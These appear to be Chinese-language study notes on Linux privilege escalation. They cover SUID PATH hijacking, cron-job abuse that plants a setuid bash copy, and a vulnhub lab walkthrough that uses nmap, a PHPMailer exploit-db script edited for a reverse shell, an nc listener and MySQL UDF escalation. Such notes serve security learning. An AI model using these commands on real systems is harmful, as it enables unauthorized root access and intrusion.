8.4linux定时任务-环境变量-数据库

配合SUID本地环境变量提权

思路原理：利用sh环境变量替换，使得/tmp/ps得到root权限；ps=sh

过程：手写调用文件-编译-复制文件-增加环境变量-执行

gcc demon1.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH # webshell权限无法设置环境变量
./shell
id

提前本地定时任务（crontab）安全

1、路径问题-利用计划任务指向文件相对路径解析问题

cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/lcn/test.sh
chmod +x /home/lcn/test.sh
/tmp/bash

2、利用通配符配合命令参数自定义命令实习提权

原理：解压命令同时可以执行命令；

3、权限问题-利用不安全的权限分配操作导致定时任务覆盖；

chmod 777 775等 普通用户通过修改计划任务覆盖其达到命令执行效果;

添加权限 chmod +x test.sh;不正确操作为chmod 777 test.sh;

提前可通过ls -al查看所有文件权限；

linux提权数据-mysql-UDF-vulnhub靶场

1、nmap进行内网探测 nmap 192.168.127.0/24

2、全端口扫描；nmap -p1-65535 192.168.127.141

3、服务探测

4、webpath目录扫描(dirbuster)，cms模块调用getshell

http://192.168.127.142/manual/

http://192.168.127.142/vendor/

5、搜索exp，getshell

	PHPMailerAutoload.php

/var/www/html/vendor/

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}。。。

version；

5.2.16

配置文件历史漏洞；

searchsploit phpmailer 搜索历史漏洞信息kali；

复制当前目录cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

2、exploit-db中下载exp

修改exp vim 40974.py ，分别为上传地址，木马路径和木马上传路径；还有反弹shell地址；

启动脚本 python3 40974.py ，监听端口nc -lvvp 4444

后续参考查找mysql账密进行udf提权；

linux提权总结

1、提权环境-信息收集（SUID，定时任务，可能漏洞，第三方服务等）

2、最新相关漏洞要明确，二次开发相关脚本（shell编程）

3、本地msf-searchexploit脚本远程exploitdb站点搜索说明

4、其他提权方法如：密码复用、guid、sudo等